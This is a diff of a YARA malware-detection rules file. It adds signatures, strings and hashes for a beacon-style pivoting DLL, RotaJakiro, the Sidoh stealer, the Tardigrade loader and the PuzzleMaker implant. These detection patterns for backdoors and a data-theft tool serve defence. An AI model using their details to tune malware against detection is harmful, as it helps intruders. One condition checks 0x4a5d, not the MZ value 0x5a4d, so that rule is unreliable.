-		$s1 = { 68 38 3c 40 00 6a 00 68 01 00 1f 00 ff 15 c4 50 41 00 85 c0 75 11 68 58 3c 40 00 6a 00 6a 00 ff 15 98 50 41 00 eb 0a e9 b0 00 00 00 e9 ab 00 00 00 c7 45 a8 00 00 00 00 68 78 3c 40 00 8b 55 c8 52 8b 45 e8 50 e8 86 9b ff ff 83 c4 0c 0f b6 c8 83 f9 01 75 0c 8b 55 a8 52 e8 02 f9 ff ff 83 c4 04 e8 ea 94 ff ff ff 15 04 51 41 00 89 45 c0 83 7d c0 00 74 3f b8 41 00 00 00 66 89 45 f0 eb 0c 66 8b 4d f0 66 83 c1 01 66 89 4d f0 0f b7 55 f0 83 fa 5a 7f 1f 8b 45 c0 83 e0 01 74 }
-		$s2 = { 68 80 16 40 00 ff 15 38 50 41 00 89 45 f0 68 90 16 40 00 8b 45 f0 50 ff 15 34 50 41 00 89 45 fc 83 7d fc 00 74 07 8d 4d f8 51 ff 55 fc 6a 00 6a 00 68 b0 16 40 00 68 08 17 40 00 68 18 17 40 00 6a 00 ff 15 4c 51 41 00 e8 9d 03 00 00 85 c0 74 2d 68 24 17 40 00 ff 15 38 50 41 00 89 45 ec 68 34 17 40 00 8b 55 ec 52 ff 15 34 50 41 00 89 45 f4 83 7d }
-		$s3 = { 81 ec f4 02 00 00 c7 85 7c ff ff ff 90 15 40 00 c7 45 80 98 15 40 00 c7 45 84 a0 15 40 00 c7 45 88 a8 15 40 00 c7 45 8c b0 15 40 00 c7 45 90 b8 15 40 00 c7 45 94 c0 15 40 00 c7 45 98 c8 15 40 00 c7 45 9c d0 15 40 00 c7 45 a0 d8 15 40 00 c7 45 a4 e0 15 40 00 c7 45 a8 e8 15 40 00 c7 45 ac f0 15 40 00 c7 45 b0 f8 15 40 00 c7 45 b4 00 16 40 00 c7 45 b8 08 16 40 00 c7 45 bc 10 16 40 00 c7 45 c0 18 16 40 00 c7 45 c4 20 16 40 00 c7 45 c8 28 16 40 00 c7 45 cc 30 16 40 00 c7 45 d0 38 16 40 00 c7 45 d4 40 16 40 00 c7 45 d8 48 16 40 00 c7 45 dc 50 16 40 00 c7 45 e0 58 16 40 00 c7 45 fc 00 00 00 00 c7 45 e4 78 00 00 00 c7 45 e8 00 00 00 00 c7 45 f4 00 00 00 00 eb 09 8b 45 f4 83 c0 01 89 45 f4 83 7d f4 1a 7d 35 8b 4d f4 8b 94 8d 7c ff ff ff 52 ff 15 f8 50 41 00 83 f8 01 75 1d 8b 45 fc 8b 4d f4 8b 94 8d 7c ff ff ff 89 94 85 14 ff ff ff 8b 45 fc 83 c0 01 89 45 fc eb bc b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff 68 00 00 01 00 e8 00 e8 00 00 83 c4 04 89 45 f8 83 7d f8 00 0f 84 d4 00 00 00 68 00 00 01 00 e8 e6 e7 00 00 83 c4 04 89 45 ec 83 7d ec 00 0f 84 ae 00 00 00 68 00 80 00 00 8b 4d f8 51 ff 15 08 51 41 00 89 45 f0 83 7d fc 00 76 63 8d 55 e8 52 8b 45 e4 50 8d 8d 0c fd ff ff 51 8b 55 f8 52 ff 15 f4 50 41 00 85 c0 74 26 8d 85 0c fd ff ff 50 ff 15 40 50 41 00 83 f8 03 75 14 b9 02 00 00 00 6b d1 00 33 c0 66 89 84 15 0c fd ff ff eb 22 8b 4d fc 83 e9 01 89 4d fc 8b 55 f8 52 8b 45 fc 8b 8c 85 14 ff ff ff 51 ff 15 44 50 41 00 eb 02 eb 1b 68 00 80 00 00 8b 55 f8 52 8b 45 f0 50 ff 15 00 51 41 00 85 c0 0f 85 7a ff ff ff 8b 4d f0 51 ff 15 fc 50 41 00 8b 55 }
+		$header = { 4D 5A 41 52 55 48 89 E5 48 83 EC 20 48 83 E4 F0 E8 00 00 00 00 5B 48 81 C3 EB 18 00 00 FF D3 48 81 C3 00 09 03 00 49 89 D8 6A 04 5A FF D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 }
+		$s1 = "\\\\%s\\pipe\\%s" fullword ascii
+		$s2 = "%04x-%04x:%s" fullword wide
+		$core1 = "core_pivot_session_new" fullword ascii
+		$core2 = "core_pivot_session_died" fullword ascii
+		$core3 = "core_pivot_remove" fullword ascii
+		$core4 = "core_pivot_add" fullword ascii
+		$lib1 = "CreateNamedPipeA" fullword ascii
+		$lib2 = "ConnectNamedPipe" fullword ascii
+		$lib3 = "WinHttpGetIEProxyConfigForCurrentUser" fullword ascii
+		$export = "ReflectiveLoader" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
+		uint16( 0 ) == 0x4a5d and filesize > 30KB and $header and 1 of ( $s* ) and 2 of ( $core* ) and 2 of ( $lib* ) and $export
 }
+rule ARKBIRD_SOLG_MAL_ELF_Rotajakiro_May_2021_1 : FILE
+{
+	meta:
+		description = "Detect the ELF version of RotaJakiro"
+		author = "Arkbird_SOLG"
+		id = "a67f9b64-8778-542f-8481-566a4ffaf5e8"
+		date = "2020-05-07"
+		modified = "2021-05-08"
+		reference = "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-08/RotaJakiro/MAL_ELF_RotaJakiro_May_2021_1.yara#L1-L21"
+		license_url = "N/A"
+		logic_hash = "8e4b9ef8a908a13e738da31b28c879228c3bdc1d8461417b1c1bf31026c98abf"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "0958e1f4c3d14e4de380bda4c5648ab4fa4459ef8f5daaf32bb5f3420217af32"
+		hash2 = "5d753e72ef89f1cef3b7007df812c7a504727816a7b91ecd75cc9acdfb7e9c2e"
+		hash3 = "a18bec90b2b6185362eeb67c516c82dd34cd8f6a7423875921572e97ae1668b0"
+		hash4 = "af2a2be20d7bbec0a9bb4a4dfa898aa18ef4994a9791d7cf37b7b62b379992ac"
+		hash5 = "d38e8f113c36cfa9e05c4d0d6b526d81b69039430c3b1fc64a08a3445b5a5abe"
+		tlp = "White"
+		adversary = "Oceanlotus"
 
-rule ARKBIRD_SOLG_TA505_Bin_21Nov_1 : FILE
+	strings:
+		$seq1 = { 41 57 41 56 41 55 41 54 41 89 f5 55 53 49 89 fc 48 83 ec 58 64 48 8b 04 25 28 00 00 00 48 89 44 24 48 31 c0 e8 77 60 ff ff 89 c7 e8 20 60 ff ff 48 8b 58 20 c6 44 24 10 85 48 8d 7c 24 10 c6 44 24 11 2d c6 44 24 12 c5 ba 22 00 00 00 c6 44 24 13 7a c6 44 24 14 02 be 30 00 00 00 c6 44 24 15 58 c6 44 24 16 30 c6 44 24 17 e4 c6 44 24 18 8a c6 44 24 19 37 c6 44 24 1a bd c6 44 24 1b 68 c6 44 24 1c f6 c6 44 24 1d f8 c6 44 24 1e 6c c6 44 24 1f 8c c6 44 24 20 97 c6 44 24 21 cb c6 44 24 22 73 c6 44 24 23 bd c6 44 24 24 7b c6 44 24 25 19 c6 44 24 26 93 c6 44 24 27 a0 c6 44 24 28 26 c6 44 24 29 26 c6 44 24 2a ae c6 44 24 2b 1c c6 44 24 2c 96 c6 44 24 2d 1d c6 44 24 2e 0f c6 44 24 2f be 44 8b 05 b6 7c 21 00 48 8b 0d b7 7c 21 00 c6 44 24 30 b2 c6 44 24 31 7d c6 44 24 32 48 c6 44 24 33 b9 c6 44 24 34 b6 c6 44 24 35 a4 c6 44 24 36 30 c6 44 24 37 43 c6 44 24 38 06 c6 44 24 39 e3 c6 44 24 3a 4f c6 44 24 3b 06 c6 44 24 3c f5 c6 44 24 3d 87 c6 44 24 3e d5 c6 44 24 3f 6a e8 3a 71 ff ff 48 89 df 48 89 c6 48 89 c5 e8 bc 6c ff ff 45 85 ed 48 89 c3 0f 85 a0 00 00 00 48 89 df e8 58 6e ff ff 85 c0 0f 84 30 01 00 00 8b 05 2a 7c 21 00 48 c7 44 24 08 00 00 00 00 48 83 ec 08 c7 44 24 0c 00 00 00 00 4c 8b 0d 16 7c 21 00 ba 2a 00 00 00 4c 89 e6 bf 01 00 00 00 50 4c 8d 44 24 14 48 8d 4c 24 18 e8 b1 71 ff ff 85 c0 5a }
+		$seq2 = { 41 54 41 b8 08 00 00 00 55 53 b9 00 f3 61 00 ba 42 00 00 00 49 89 fd 49 89 f4 48 83 ec 68 be 50 00 00 00 48 89 e7 c6 04 24 bf c6 44 24 01 cf 64 48 8b 04 25 28 00 00 00 48 89 44 24 58 31 c0 c6 44 24 02 c6 c6 44 24 03 a1 c6 44 24 04 20 c6 44 24 05 76 c6 44 24 06 5d c6 44 24 07 e5 c6 44 24 08 ec c6 44 24 09 87 c6 44 24 0a 45 c6 44 24 0b 26 c6 44 24 0c e1 c6 44 24 0d c8 c6 44 24 0e 8e c6 44 24 0f c0 c6 44 24 10 89 c6 44 24 11 d2 c6 44 24 12 ac c6 44 24 13 c1 c6 44 24 14 01 c6 44 24 15 08 c6 44 24 16 ac c6 44 24 17 8e c6 44 24 18 52 c6 44 24 19 65 c6 44 24 1a c9 c6 44 24 1b 06 c6 44 24 1c be c6 44 24 1d 82 c6 44 24 1e ef c6 44 24 1f 85 c6 44 24 20 9f c6 44 24 21 96 c6 44 24 22 fa c6 44 24 23 65 c6 44 24 24 50 c6 44 24 25 dd c6 44 24 26 0e c6 44 24 27 e0 c6 44 24 28 87 c6 44 24 29 ba c6 44 24 2a 27 c6 44 24 2b f8 c6 44 24 2c ef c6 44 24 2d 5c c6 44 24 2e 60 c6 44 24 2f 07 c6 44 24 30 b1 c6 44 24 31 c5 c6 44 24 32 3d c6 44 24 33 81 c6 44 24 34 df c6 44 24 35 87 c6 44 24 36 64 c6 44 24 37 01 c6 44 24 38 04 c6 44 24 39 9b c6 44 24 3a f9 c6 44 24 3b da c6 44 24 3c 28 c6 44 24 3d f1 c6 44 24 3e 30 c6 44 24 3f cb c6 44 24 40 c8 c6 44 24 41 48 c6 44 24 42 43 c6 44 24 43 e6 c6 44 24 44 e5 c6 44 24 45 f3 c6 44 24 46 c9 c6 44 24 47 8b c6 44 24 48 3c c6 44 24 49 a7 c6 44 24 4a 8b c6 44 24 4b 48 c6 44 24 4c 54 c6 44 24 4d 13 c6 44 24 4e 2b c6 44 24 4f bb e8 a4 aa ff ff bf 00 04 00 00 48 89 c5 e8 77 9a ff ff be 00 04 00 00 48 89 c3 48 89 c7 e8 37 9b ff ff 4c 89 ea 48 }
+		$seq3 = { 48 8d 7c 24 10 c6 44 24 10 fb c6 44 24 11 d0 64 48 8b 04 25 28 00 00 00 48 89 84 24 08 01 00 00 31 c0 c6 44 24 12 8d c6 44 24 13 ac c6 44 24 14 db c6 44 24 15 79 c6 44 24 16 84 c6 44 24 17 52 c6 44 24 18 44 c6 44 24 19 46 c6 44 24 1a 6c c6 44 24 1b d1 c6 44 24 1c ac c6 44 24 1d 31 c6 44 24 1e ca c6 44 24 1f 18 c6 44 24 20 18 c6 44 24 21 90 c6 44 24 22 ec c6 44 24 23 8f c6 44 24 24 a1 c6 44 24 25 74 c6 44 24 26 a8 c6 44 24 27 9a c6 44 24 28 53 c6 44 24 29 d4 c6 44 24 2a a4 c6 44 24 2b 5b c6 44 24 2c 68 c6 44 24 2d c8 c6 44 24 2e dd c6 44 24 2f a5 e8 18 a9 ff ff 48 89 c7 49 89 c5 e8 4d a6 ff ff 83 f8 01 74 40 31 db 4d 85 ed 74 08 4c 89 ef e8 b9 95 ff ff 48 8b 8c 24 08 01 00 00 64 48 33 }
+		$seq4 = { ba 15 00 00 00 be 20 00 00 00 c6 44 24 30 b1 c6 44 24 31 be c6 44 24 32 54 c6 44 24 33 93 c6 44 24 34 29 c6 44 24 35 67 c6 44 24 36 1f c6 44 24 37 b5 c6 44 24 38 a5 c6 44 24 39 ec c6 44 24 3a 18 c6 44 24 3b 53 c6 44 24 3c f0 c6 44 24 3d f1 c6 44 24 3e fe c6 44 24 3f 9f c6 44 24 40 27 c6 44 24 41 8f c6 44 24 42 8d c6 44 24 43 77 c6 44 24 44 1e c6 44 24 45 e1 c6 44 24 46 e1 c6 44 24 47 f0 c6 44 24 48 9e c6 44 24 49 e2 c6 44 24 4a 0d c6 44 24 4b 96 c6 44 24 4c ff c6 44 24 4d 6c c6 44 24 4e b4 c6 44 24 4f 16 e8 09 a8 ff ff 4c 89 ef 48 89 c6 49 89 c4 e8 8b a3 ff ff 48 8d bc 24 90 00 00 00 41 b8 08 00 00 00 b9 00 f3 61 00 ba 69 00 00 00 be 70 00 00 00 48 89 04 24 c6 84 24 90 00 00 00 b3 c6 84 24 91 00 00 00 0b c6 84 24 92 00 00 00 18 c6 84 24 93 00 00 00 fd c6 84 24 94 00 00 00 71 c6 84 24 95 00 00 00 3b c6 84 24 96 00 00 00 b7 c6 84 24 97 00 00 00 fc c6 84 24 98 00 00 00 70 c6 84 24 99 00 00 00 18 c6 84 24 9a 00 00 00 f7 c6 84 24 9b 00 00 00 22 c6 84 24 9c 00 00 00 2d c6 84 24 9d 00 00 00 75 c6 84 24 9e 00 00 00 5d c6 84 24 9f 00 00 00 8f c6 84 24 a0 00 00 00 75 c6 84 24 a1 00 00 00 60 c6 84 24 a2 00 00 00 91 c6 84 24 a3 00 00 00 b3 c6 84 24 a4 00 00 00 1a c6 84 24 a5 00 00 00 0b c6 84 24 a6 00 00 00 00 c6 84 24 a7 00 00 00 5c c6 84 24 a8 00 00 00 6b c6 84 24 a9 00 00 00 8d c6 84 24 aa 00 00 00 ee c6 84 24 ab 00 00 00 3b c6 84 24 ac 00 00 00 7e c6 84 24 ad 00 00 00 67 c6 84 24 ae 00 00 00 72 c6 84 24 af 00 00 00 43 c6 84 24 b0 00 00 00 f6 c6 84 24 b1 00 00 00 14 c6 84 24 b2 00 00 00 32 c6 84 24 b3 00 00 00 c1 c6 84 24 b4 00 00 00 79 c6 84 24 b5 00 00 00 0d c6 84 24 b6 00 00 00 0d c6 84 24 b7 00 00 00 22 c6 84 24 b8 00 00 00 e1 c6 84 24 b9 00 00 00 bd c6 84 24 ba 00 00 00 3f c6 84 24 bb 00 00 00 82 c6 84 24 bc 00 00 00 dd c6 84 24 bd 00 00 00 23 c6 84 24 be 00 00 00 7d c6 84 24 bf 00 00 00 87 c6 84 24 c0 00 00 00 34 c6 84 24 c1 00 00 00 9d c6 84 24 c2 00 00 00 43 c6 84 24 c3 00 00 00 98 c6 84 24 c4 00 00 00 da c6 84 24 c5 00 00 00 e0 c6 84 24 c6 00 00 00 3d c6 84 24 c7 00 00 00 64 c6 84 24 c8 00 00 00 1a c6 84 24 c9 00 00 00 d7 c6 84 24 ca 00 00 00 f5 c6 84 24 cb 00 00 00 5a c6 84 24 cc 00 00 00 c3 c6 84 24 cd 00 00 00 9c c6 84 24 ce 00 00 00 97 c6 84 24 cf 00 00 00 c7 c6 84 24 d0 00 00 00 65 c6 84 24 d1 00 00 00 8f c6 84 24 d2 00 00 00 99 c6 84 24 d3 00 00 00 eb c6 84 24 d4 00 00 00 2f c6 84 24 d5 00 00 00 2b c6 84 24 d6 00 00 00 d0 c6 84 24 d7 00 00 00 d9 c6 84 24 d8 00 00 00 4e c6 84 24 d9 00 00 00 8f c6 84 24 da 00 00 00 7b c6 84 24 db 00 00 00 97 c6 84 24 dc 00 00 00 3b c6 84 24 dd 00 00 00 14 c6 84 24 de 00 00 00 e9 c6 84 24 df 00 00 00 e9 c6 84 24 e0 00 00 00 82 c6 84 24 e1 00 00 00 48 c6 84 24 e2 00 00 00 dc c6 84 24 e3 00 00 00 a3 c6 84 24 e4 00 00 00 75 c6 84 24 e5 00 00 00 ca c6 84 24 e6 00 00 00 e6 c6 84 24 e7 00 00 00 40 c6 84 24 e8 00 00 00 6b c6 84 24 e9 00 00 00 b1 c6 84 24 ea 00 00 00 68 c6 84 24 eb 00 00 00 42 c6 84 24 ec 00 00 00 56 c6 84 24 ed 00 00 00 b4 c6 84 24 ee 00 00 00 ac c6 84 24 ef 00 00 00 2a c6 84 24 f0 00 00 00 fc c6 84 24 f1 00 00 00 34 c6 84 24 f2 00 00 00 fa c6 84 24 f3 00 00 00 1d c6 84 24 f4 00 00 00 1b c6 84 24 f5 00 00 00 9a c6 84 24 f6 00 00 00 62 c6 84 24 f7 00 00 00 b3 c6 84 24 f8 00 00 00 39 c6 84 24 f9 00 00 00 6a c6 84 24 fa 00 00 00 19 c6 84 24 fb 00 00 00 1b c6 84 24 fc 00 00 00 f3 c6 84 24 fd 00 00 00 c5 c6 84 24 fe 00 00 00 d2 c6 84 24 ff 00 00 00 6a e8 55 a4 ff ff 48 89 c7 48 89 c5 e8 4a 92 ff ff 44 8d 7c 03 0a 4d 63 ff 4c 89 ff e8 1a 94 ff ff 4c 89 fe 48 89 c3 48 89 c7 e8 dc 94 ff ff 4c 89 f2 48 89 ee 48 89 df 31 c0 e8 2c 95 ff ff 48 89 da 8b 0a 48 83 c2 04 8d 81 ff fe fe fe f7 d1 21 c8 25 80 80 80 80 74 e9 89 c1 4c 8b 3c 24 48 89 de c1 e9 10 a9 80 80 00 00 0f 44 c1 48 8d 4a 02 4c 89 ff 48 0f 44 d1 89 c1 00 c1 48 83 da 03 48 29 da e8 93 a8 ff ff 4c 89 ff be ed 01 00 00 4c 89 3c 24 e8 d2 aa ff ff 48 8d 44 24 50 41 b8 08 00 00 00 b9 00 f3 61 00 ba 34 00 00 00 be 40 00 00 00 c6 44 24 50 c6 48 89 c7 c6 44 24 51 3b c6 44 24 52 16 c6 44 24 53 01 c6 44 24 54 92 c6 44 24 55 36 c6 44 24 56 81 c6 44 24 57 c8 c6 44 24 58 f3 c6 44 24 59 49 c6 44 24 5a a8 c6 44 24 5b 02 c6 44 24 5c 6f c6 44 24 5d 9d c6 44 24 5e db c6 44 24 5f 61 c6 44 24 60 8a c6 44 24 61 e3 c6 44 24 62 f4 c6 44 24 63 1b c6 44 24 64 33 c6 44 24 65 4d c6 44 24 66 b4 c6 44 24 67 00 c6 44 24 68 f4 c6 44 24 69 76 c6 44 24 6a 70 c6 44 24 6b 56 c6 44 24 6c e2 c6 44 24 6d f3 c6 44 24 6e 5c c6 44 24 6f 73 c6 44 24 70 06 c6 44 24 71 de c6 44 24 72 c5 c6 44 24 73 fa c6 44 24 74 4c c6 44 24 75 7b c6 44 24 76 34 c6 44 24 77 b9 c6 44 24 78 d3 c6 44 24 79 a6 c6 44 24 7a 9b c6 44 24 7b 03 c6 44 24 7c f7 c6 44 24 7d 8e c6 44 24 7e 37 c6 44 24 7f 6a c6 84 24 80 00 00 00 3a c6 84 24 81 00 00 00 97 c6 84 24 82 00 00 00 57 c6 84 24 83 00 00 00 25 c6 84 24 84 00 00 00 2c c6 84 24 85 00 00 00 ac c6 84 24 86 00 00 00 a6 c6 84 24 87 00 00 00 de c6 84 24 88 00 00 00 29 c6 84 24 89 00 00 00 ca c6 84 24 8a 00 00 00 c0 c6 84 24 8b 00 00 00 93 c6 84 24 8c 00 00 00 67 c6 84 24 8d 00 00 00 47 c6 84 24 8e 00 00 00 8d c6 84 24 8f 00 00 00 }
+
+	condition:
+		uint32( 0 ) == 0x464c457f and filesize > 10KB and 3 of ( $seq* )
+}
+rule ARKBIRD_SOLG_MAL_Sidoh_Stealer_Aug_2021_1 : FILE
 {
 	meta:
-		description = "module1.bin"
+		description = "Detect Sidoh Stealer used by RYUK group"
 		author = "Arkbird_SOLG"
-		id = "2f23653e-5158-5a64-86ee-a58048780661"
-		date = "2019-11-21"
-		modified = "2019-11-21"
-		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L3-L30"
+		id = "b4661304-6dfa-5c33-95f2-8694271b9e58"
+		date = "2021-08-31"
+		modified = "2021-09-01"
+		reference = "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-31/Sidoh/MAL_Sidoh_Stealer_Aug_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "133f202300a9e0428d20ce76bc832cf45cb5dacb05e39c21130d8d5cc39446ba"
+		logic_hash = "baeea14c6be42d64d3ca68298bf6ced34c9587fcda91471945cfc7ed1fe267bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "bfe610790d41091c37ae627472f5f8886357e713945ca8a5e2b56cd6c791f989"
+		hash1 = "a1ce52437252001b56c9ccd2d2da46240dc38db8074a5ed39a396e8c8e387fc2"
+		hash2 = "c64269a64b64b20108df89c4f1a415936c9d9923f8761d0667aa8492aa057acb"
+		hash3 = "e6762cb7d09cd90d5469e3c3bfc3b47979cd67aa06c06e893015a87b0348c32c"
+		hash4 = "cc4a0b4080844e20fb9535679f7b09a3e2449729ce1815d1e5a64272b0225465"
+		tlp = "White"
+		adversary = "RYUK (RAAS)"
 
 	strings:
-		$s1 = "intc.dll" fullword ascii
-		$s2 = "?%?2?7?=?" fullword ascii
-		$s3 = "Is c++ not java" fullword ascii
-		$s4 = "4%5K5e5l5p5t5x5|5" fullword ascii
-		$s5 = "KdaMt$" fullword ascii
-		$s6 = ";*;9;Z;`;" fullword ascii
-		$s7 = "<*<4<?<I<S<Y<" fullword ascii
-		$s8 = "0'040A0K0U0]0k0" fullword ascii
-		$s9 = "3 3(30363>3M3_3" fullword ascii
-		$s10 = ": :9:A:F:R:W:t:z:" fullword ascii
-		$s11 = "5'5,585@5H5P5f5n5v5~5" fullword ascii
-		$s12 = "<,<2<:<@<h<n<" fullword ascii
-		$s13 = "8+808:8T8b8j8p8" fullword ascii
-		$s14 = "8!9<9K9g9o9z9" fullword ascii
-		$s15 = ">(>6>D>N>U>f>p>" fullword ascii
-		$s16 = ":!:,:>:J:X:^:c:i:v:" fullword ascii
+		$s1 = { 68 88 13 00 00 ff 15 ?? 30 41 00 ff 76 04 ff 15 ?? 30 41 00 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 83 c4 0c ff 15 ?? 30 41 00 8b f8 8b f3 8b d7 8b ce d3 ea f6 c2 01 74 34 8d 46 41 6a 3a 66 a3 ?? f6 41 00 58 66 a3 ?? f6 41 00 33 c0 68 ?? f6 41 00 66 a3 ?? f6 41 00 ff 15 ?? 30 41 00 83 f8 05 74 0a b9 ?? f6 41 00 e8 ?? ?? 00 00 46 83 fe 1a 7c bb 68 10 27 00 00 53 68 ?? f6 41 00 e8 ?? ?? 00 00 8b 3d ?? 30 41 00 8d 44 24 28 83 c4 0c 89 5c 24 1c 6a 01 50 53 ff d7 8b 35 ?? 30 41 00 6a 04 68 00 10 00 00 ff 74 24 24 53 ff d6 8b d8 8d 44 24 1c 6a 01 50 53 89 5c 24 30 ff d7 6b 0b 18 6a 04 68 00 10 00 00 51 33 c9 51 ff d6 68 00 40 00 00 6a 40 89 44 24 38 ff 15 ?? 30 41 00 33 f6 89 44 24 2c 89 74 24 }
+		$s2 = { 8b ca c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 33 f6 56 56 56 6a 01 56 ff 15 ?? 31 41 00 a3 ?? ?? 42 00 8b fe 85 c0 74 4e 56 68 00 00 00 08 6a 01 68 ?? ?? 41 00 68 ?? ec 41 00 6a 15 ff 75 f8 50 ff 15 ?? 31 41 00 8b f8 85 ff 74 42 56 6a 02 8d 85 f0 fc ff ff 50 53 57 ff 15 ?? 31 41 00 85 c0 75 0f ff 15 ?? 30 41 00 8b d8 a1 ?? ?? 42 00 eb 08 a1 ?? ?? 42 00 33 db 43 8b 35 ?? 31 41 00 50 ff d6 57 ff d6 8b c3 5f 5e 5b 8b e5 }
+		$s3 = { 55 8b ec 83 ec 58 53 8b 1d ?? 30 41 00 56 57 6a 04 68 00 10 00 00 6a 02 6a 00 89 55 f0 8b f1 ff d3 8b f8 85 ff 75 08 83 c8 ff e9 0f 01 00 00 56 68 ?? ?? 41 00 57 e8 93 ff ff ff 83 65 f8 00 8d 45 f8 50 6a 00 57 ff 15 ?? 31 41 00 83 c4 18 8b f0 83 7d f8 00 89 75 f4 74 04 6a fd eb 33 83 65 ac 00 8d 45 ac 50 ff 15 ?? 31 41 00 8d 45 ac 50 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 83 c4 14 83 7d c8 00 77 10 72 06 }
+		$s4 = { 6a 04 68 00 10 00 00 ff 75 c4 6a 00 ff d3 8b d8 85 db 75 1a 68 00 80 00 00 50 57 ff 15 ?? 30 41 00 56 ff 15 ?? 31 41 00 59 6a fb 58 eb 79 6a 00 68 ?? ?? 41 00 56 ff 15 ?? 31 41 00 ff 75 c8 8b f0 ff 75 c4 53 56 ff 15 ?? 31 41 00 56 ff 15 ?? 31 41 00 ff 75 f4 ff 15 ?? 31 41 00 ff 75 08 8b 55 c4 8b cb ff 75 f0 e8 3b 02 00 00 8b f0 83 c4 2c 85 f6 75 14 83 7d 08 05 75 0e 8b 55 c4 51 8b cb e8 b3 09 00 00 59 8b f0 68 00 80 00 00 6a 00 53 ff 15 ?? 30 41 00 68 00 80 00 00 6a 00 57 ff 15 ?? 30 41 00 8b c6 5f 5e 5b 8b e5 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "642f4619fb2d93cb205c65c2546516ca" and pe.exports ( "intc" ) or 8 of them )
+		uint16( 0 ) == 0x5A4D and filesize > 20KB and all of ( $s* )
 }
+rule ARKBIRD_SOLG_APT_Tardigrade_Nov_2021_1 : FILE
+{
+	meta:
+		description = "Detect Tardigrade loader"
+		author = "Arkbird_SOLG"
+		id = "f6c8014a-21dd-5ebd-9edd-7a9f649a43a0"
+		date = "2021-11-22"
+		modified = "2021-11-23"
+		reference = "https://www.isac.bio/post/tardigrade"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-22/APT_Tardigrade_Nov_2021_1.yara#L1-L19"
+		license_url = "N/A"
+		logic_hash = "98358d9dbf62e653b136268d8694ed4d7f48c80125dd12ccea5f36ff5c6b4a3c"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "1c7c1a28921d81f672320e81ad58642ef3b8e27abf8a8e51400b98b40f49568be"
+		hash2 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
+		hash3 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
+		tlp = "white"
+		adversary = "Tardigrade"
 
-rule ARKBIRD_SOLG_TA505_Bin_21Nov_2 : FILE
+	strings:
+		$s1 = { 63 6d 64 2e 65 78 65 20 2f 63 20 65 63 68 6f 20 [10-40] 3e 22 25 73 22 26 65 78 69 74 }
+		$s2 = { 4c 89 44 24 38 89 54 24 34 48 89 4c 24 28 e8 [2] 01 00 e8 [2] 01 00 4c 8b 44 24 38 8b 54 24 34 48 8b 4c 24 28 48 83 c4 48 e9 71 fe ff ff 90 48 89 ca 48 8d 0d 76 ?? 02 00 }
+		$s3 = { 41 57 41 56 41 55 41 54 55 57 56 53 48 ?? ec [1-4] 48 8b 84 24 ?? 00 00 00 48 89 44 24 60 48 8b 05 [2] 01 00 48 89 4c 24 40 ?? 38 }
+		$s4 = { 45 31 c0 48 8d 8c 24 ?? 02 00 00 4c 8d 8c 24 ?? 01 00 00 48 8d 15 [2] 01 00 ff 15 [2] 02 00 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 50KB and all of them
+}
+rule ARKBIRD_SOLG_APT_Puzzlemaker_Implant_Jun_2021_1 : FILE
 {
 	meta:
-		description = "vspub1.bin"
+		description = "Detect the implant of the PuzzleMaker group"
 		author = "Arkbird_SOLG"
-		id = "2bbd1d3a-50ab-5c6a-97fe-60b5a86e8d18"
-		date = "2019-11-21"
-		modified = "2019-11-21"
-		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L32-L50"
+		id = "9387130c-4474-55bf-9736-09494a5e81b8"
+		date = "2021-06-10"
+		modified = "2021-11-01"
+		reference = "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-09/PuzzleMaker/APT_PuzzleMaker_Implant_Jun_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "43fb83abdeb1a31da836b4cf99dcda269f6d005cbb8eb2d845498d2c589574e1"
+		logic_hash = "e54eaaa76b2d370a27a232dee2299266f8b3b82d53da36e35c2a6fcdd7d5b1f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "54cc27076793d5de064813c61d52452d42f774d24b3859a63002d842914fd9cd"
+		hash1 = "8a17279ba26c8fbe6966ea3300fdefb1adae1b3ed68f76a7fc81413bd8c1a5f6"
+		hash2 = "1ee9bb4e8bcabe197399b654dbf940438b120af1c376719ff9bdccf2bb1dc606"
+		hash3 = "f2ce2a00de8673f52d37911f3e0752b8dfab751b2a17e719a565b4083455528e"
+		tlp = "White"
+		adversary = "PuzzleMaker"
 
 	strings:
-		$s1 = "glColor.dll" fullword ascii
-		$s2 = "{sysdir}\\nvu*.exe" fullword ascii
-		$s3 = "KLSUIrhekheirguhemure" fullword ascii
-		$s4 = "tEo>qM" fullword ascii
-		$s5 = "?\"?0?8?>?I?V?^?l?q?v?{?" fullword ascii
